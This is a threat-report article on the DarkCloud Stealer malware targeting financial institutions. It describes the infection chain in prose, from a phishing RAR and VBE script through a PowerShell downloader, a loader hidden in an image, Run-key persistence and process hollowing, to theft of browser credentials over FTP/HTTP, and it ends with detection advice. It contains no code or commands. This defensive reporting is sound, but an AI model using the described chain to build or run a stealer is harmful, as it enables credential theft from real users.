In recent developments, the DarkCloud Stealer malware has emerged as a formidable threat to financial institutions, employing sophisticated phishing campaigns that utilize weaponized RAR attachments to infiltrate systems and exfiltrate sensitive data.
Infection Mechanism
The attack initiates when an unsuspecting recipient opens a seemingly legitimate RAR archive, often labeled with enticing names such as Proof of Payment.rar. Contained within is a VBE script that, upon execution, leverages the Windows Script Host to launch a PowerShell downloader. This downloader retrieves an image file, typically a JPG, which clandestinely harbors the malware’s loader.
The PowerShell script meticulously scans the image file’s byte data to locate a specific BMP header pattern, enabling the extraction of the .NET DLL module embedded within the image’s pixel data. This technique allows the malware to execute directly from memory, effectively bypassing traditional disk-based detection mechanisms.
Establishing Persistence and Data Exfiltration
Once operational, DarkCloud Stealer ensures its persistence by copying a JavaScript payload to the Windows Run registry key under a deceptive filename, such as M3hd0pf.exe, masquerading as legitimate system processes like MSBuild.exe. This strategy guarantees the malware’s execution upon each user login.
The stealer employs process hollowing techniques to inject itself into legitimate processes, including MSBuild.exe and mtstocom.exe. This method facilitates the extraction of stored credentials from browser databases, notably Chrome’s Login Data. Endpoint detection systems have reported events indicating attempts to decrypt stored passwords directly in memory, highlighting the malware’s advanced capabilities.
The exfiltrated data is then staged within user directories and transmitted via FTP and HTTP channels to dynamic domain clusters, often utilizing top-level domains like .shop and .xyz. This approach complicates network-based detection efforts, as the malware’s communication blends seamlessly with legitimate traffic.
Recommendations for Financial Institutions
To mitigate the risks posed by DarkCloud Stealer, financial institutions are advised to implement the following measures:
– Monitor for Anomalous Script Execution: Regularly audit systems for unexpected execution of VBE/VBS scripts, which may indicate malicious activity.
– Inspect Registry Modifications: Keep a vigilant eye on changes to the Windows Run registry key, especially for entries that do not correspond to known legitimate applications.
– Scrutinize Downloaded JavaScript Files: Exercise caution with JavaScript files located in public download folders, as these may serve as vectors for malware deployment.
By adopting these proactive monitoring strategies, organizations can enhance their ability to detect and neutralize threats like DarkCloud Stealer before significant damage occurs.
